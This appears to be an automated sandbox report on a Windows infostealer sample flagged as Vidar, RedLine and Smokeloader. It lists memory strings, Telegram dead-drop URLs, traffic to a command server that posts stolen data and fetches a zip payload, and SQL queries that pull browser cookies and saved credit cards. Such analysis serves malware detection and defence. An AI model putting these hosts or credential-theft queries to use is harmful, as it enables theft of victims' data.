Source: 60379239670748708072323449.1.dr, 59242670612831660624168672.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 00440746450577075373182215.1.dr, 37707990510604932654966133.1.dr, 60379239670748708072323449.1.dr, 59242670612831660624168672.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 60379239670748708072323449.1.dr, 59242670612831660624168672.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245807_df5ad55fdd604472a86a45a217032c7dM
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=15&ct=1690545750&rver=7.3.6960.0&wp=MBI_SSL&wre
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: https://mozilla.org0/
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u321-b07/df5ad55fdd604472a86a45a217032c7d/jre-8u321-wind
Source: file.exe, file.exe, 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.3693314502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199545993403
Source: file.exe, 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.3693314502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199545993403update.zip
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: 77364074545019038892817732.1.dr String found in binary or memory: https://support.mozilla.org
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.
Source: file.exe, 00000001.00000002.3721084273.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: file.exe, 00000001.00000002.3721084273.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3693314502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/vogogor
Source: file.exe, 00000001.00000002.3707864447.000000000464E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/vogogorL
Source: file.exe, 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.3693314502.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000001.00000003.1481373645.0000000004160000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/vogogorracvotsp1.zipMozilla/5.0
Source: file.exe, 00000001.00000002.3707864447.000000000464E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/vogogorv
Source: file.exe, 00000001.00000002.3721084273.0000000004A5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/vogogorx
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.zip
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.zipQ
Source: file.exe, 00000001.00000003.1536347021.0000000010EB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3729994076.000000001157C000.00000004.00000020.00020000.00000000.sdmp, 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/Sun
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 37707990510604932654966133.1.dr, 60379239670748708072323449.1.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: 93702365600485792059963927.1.dr String found in binary or memory: https://www.google.com/chrome/
Source: 93702365600485792059963927.1.dr String found in binary or memory: https://www.google.com/chrome/Google
Source: file.exe, 00000001.00000002.3730149645.000000001198E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000003.1564532439.0000000010EB7000.00000004.00000020.00020000.00000000.sdmp, 38345013959471306846242542.1.dr, 93702365600485792059963927.1.dr String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=1&installdataindex=empty&defaultbrowser=0
Source: 93702365600485792059963927.1.dr String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=1&installdataindex=empty&defaultbrowser=0Google
Source: 60379239670748708072323449.1.dr String found in binary or memory: https://www.google.com/favicon.ico
Source: file.exe, 00000001.00000003.1565422518.0000000010EB7000.00000004.00000020.00020000.00000000.sdmp, 38345013959471306846242542.1.dr, 93702365600485792059963927.1.dr String found in binary or memory: https://www.google.com/https://www.google.com/chrome/Thu
Source: 00440746450577075373182215.1.dr, 59242670612831660624168672.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/search?q=microsoft&oq=microsoft&gs_lcrp=EgZjaHJvbWUqEAgAEAAYgwEY4wIYsQMYgAQyE
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/search?q=microsoft&sourceid=chrome&ie=UTF-8microsoft
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/search?q=microsoft&sourceid=chrome&ie=UTF-8microsoftt
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0i131i433i512j0i512j0i131i433i512l2j0
Source: 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/search?q=test&sourceid=chrome&ie=UTF-8test
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dmicrosoft%26oq%3Dmic
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000001.00000003.1536347021.0000000010EB7000.00000004.00000020.00020000.00000000.sdmp, 30562671907380543272507388.1.dr, 05817041688375942296226764.1.dr String found in binary or memory: https://www.mozilla.org/
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/firefox/115.0.3/whatsnew/?oldversion=98.0.2
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/en-US/firefox/115.0.3/whatsnew/?oldversion=98.0.2What
Source: file.exe, 00000001.00000002.3729994076.000000001157C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/firefox/download/thanks/
Source: 05817041688375942296226764.1.dr String found in binary or memory: https://www.mozilla.org/en-US/firefox/download/thanks/https://www.mozilla.org/en-GB/firefox/new/
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/115.0.3/whatsnew/?oldversion=98.0.2
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/firefox/115.0.3/whatsnew/?oldversion=98.0.2gro.allizom.www.
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/central/
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/firefox/central/gro.allizom.www.
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/media/protocol/img/logos/firefox/browser/og.4ad05d4125a5.png
Source: file.exe, 00000001.00000002.3729784367.000000001116C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000001.00000003.1509460859.000000001103E000.00000004.00000020.00020000.00000000.sdmp, 77364074545019038892817732.1.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----4389493767942367User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13Host: 195.201.254.123:6012Content-Length: 126637Connection: Keep-AliveCache-Control: no-cache
Source: unknown DNS traffic detected: queries for: t.me
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0040E600 DeleteUrlCacheEntry,DeleteUrlCacheEntry,InternetOpenA,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 1_2_0040E600
Source: global traffic HTTP traffic detected: GET /vogogor HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
Source: global traffic HTTP traffic detected: GET /b2ced91faf30889899f34458f95b8e93 HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13Host: 195.201.254.123:6012
Source: global traffic HTTP traffic detected: GET /sp1.zip HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.2.13 (KHTML, like Gecko) Version/16.5.2 Safari/605.2.13Host: 195.201.254.123:6012Cache-Control: no-cache
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.8:49773 version: TLS 1.2

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000001.00000002.3698810477.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: file.exe PID: 7912, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000001.00000002.3698889782.0000000004100000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000002.3698810477.0000000004090000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Process Memory Space: file.exe PID: 7912, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004294F0 1_2_004294F0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00408740 1_2_00408740
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00427090 1_2_00427090
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004270B8 1_2_004270B8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0043C33D 1_2_0043C33D
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00438380 1_2_00438380
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0043E4FF 1_2_0043E4FF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0043D4BB 1_2_0043D4BB
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B541 1_2_0044B541
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B55C 1_2_0044B55C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B56C 1_2_0044B56C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B568 1_2_0044B568
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B5E8 1_2_0044B5E8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B668 1_2_0044B668
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B674 1_2_0044B674
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B614 1_2_0044B614
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B620 1_2_0044B620
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B62C 1_2_0044B62C
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004066C8 1_2_004066C8
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004066A0 1_2_004066A0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B6B0 1_2_0044B6B0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0044B6BC 1_2_0044B6BC
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00438768 1_2_00438768
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0043777B 1_2_0043777B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00427730 1_2_00427730
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_004087BE 1_2_004087BE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0043C88E 1_2_0043C88E
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00401090 appears 131 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000001.00000000.1220167638.000000000243D000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamepetting.exe> vs file.exe
Source: file.exe, 00000001.00000003.1501124219.0000000010A11000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs file.exe
Source: file.exe, 00000001.00000002.3729241460.0000000010A10000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenamepetting.exe> vs file.exe
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe ReversingLabs: Detection: 65%
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@1/22@1/2
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041F770 CoCreateInstance,SysAllocString,SysFreeString,SysFreeString,SysFreeString, 1_2_0041F770
Source: softokn3.dll.1.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cardsz;y
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3.dll.1.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000001.00000002.3696575131.000000000252E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies};x
Source: file.exe, 00000001.00000002.3696575131.000000000259D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies{;y
Source: softokn3.dll.1.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: 41854390081158473842695081.1.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3.dll.1.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000001.00000002.3729067726.00000000108F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000001.00000002.3730733535.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3.dll.1.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_0041F820 CreateToolhelp32Snapshot,Process32First,Process32Next,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,Process32Next,CloseHandle, 1_2_0041F820
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: house 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Parliament 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: India 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: also 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: granddaughter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Freedom 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Fighter 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Rameshwar 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Prasad 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sinha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lovely 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Anand 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Indian 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: politician 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: and 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: former 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: member 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: 10th 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Lok 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: Sabha 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: the 1_2_004107F0
Source: C:\Users\user\Desktop\file.exe Command line argument: lower 1_2_004107F0
